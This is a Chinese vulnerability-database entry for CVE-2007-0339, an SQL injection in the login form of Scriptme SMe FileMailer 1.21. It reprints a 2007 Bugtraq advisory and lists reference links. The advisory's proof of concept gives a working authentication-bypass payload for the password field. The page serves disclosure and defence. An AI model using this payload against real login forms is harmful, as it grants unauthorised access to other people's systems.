Scriptme SMe FileMailer 'index.php' Sql 注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192087 漏洞类型 SQL注入
发布时间 2007-01-17 更新时间 2007-01-17
CVE编号 CVE-2007-0339 CNNVD-ID CNNVD-200701-268
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/82001
https://cxsecurity.com/issue/WLB-2007010069
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-268
|漏洞详情
ScriptmeSMeFileMailer1.21版本的index.php(又称登录格式)中存在SQL注入漏洞。远程攻击者可以借助密码字段,执行任意的SQL指令。
|漏洞EXP
-=[--------------------ADVISORY-------------------]=-
                                              
                  SmE FileMailer 1.21
                                               
  Author: CorryL    [corryl80 (at) gmail (dot) com [email concealed]]   
-=[-----------------------------------------------]=-

-=[+] Application:    SmE FileMailer 
-=[+] Version:        1.21
-=[+] Vendor's URL:   http://www.scriptme.com/down/13 
-=[+] Platform:       WindowsLinuxUnix
-=[+] Bug type:       sql injection
-=[+] Exploitation:   Remote
-=[-]
-=[+] Author:           CorryL  ~ corryl80[at]gmail[dot]com ~
-=[+] Reference:       www.x0n3-h4ck.org
-=[+] Virtual Office:  http://www.kasamba.com/CorryL
-=[+] Irc Chan:         irc.darksin.net #x0n3-h4ck

..::[ Descriprion ]::..

SMe FileMailer lets you require visitors to submit their name and email address in order to retrieve a file from your site. Upon submitting the information, the link for file is sent to the visitor via email. This is a great way to stop leeching and third-party linking of your files, and it also lets you know exactly who's obtaining your files!

..::[ Proof Of Concept ]::..

In the login form insert

Login: admin

Password: anything' OR 'x'='x

..::[ Disclousure Timeline ]::..

[16/01/2007] - Public disclousure
|受影响的产品
scriptme Sme Filemailer 1.21
|参考资料

来源:BUGTRAQ
名称:20070116[x0n3-h4ck]SmEFileMailer1.21RemoteSqlInjextionExploit
链接:http://www.securityfocus.com/archive/1/archive/1/457071/100/0/threaded
来源:VIM
名称:20070117SourceVERIFYofSMeFileMailer1.21SQLinjection
链接:http://www.attrition.org/pipermail/vim/2007-January/001244.html
来源:SECUNIA
名称:23766
链接:http://secunia.com/advisories/23766
来源:OSVDB
名称:32832
链接:http://osvdb.org/32832
来源:SREASON
名称:2154
链接:http://securityreason.com/securityalert/2154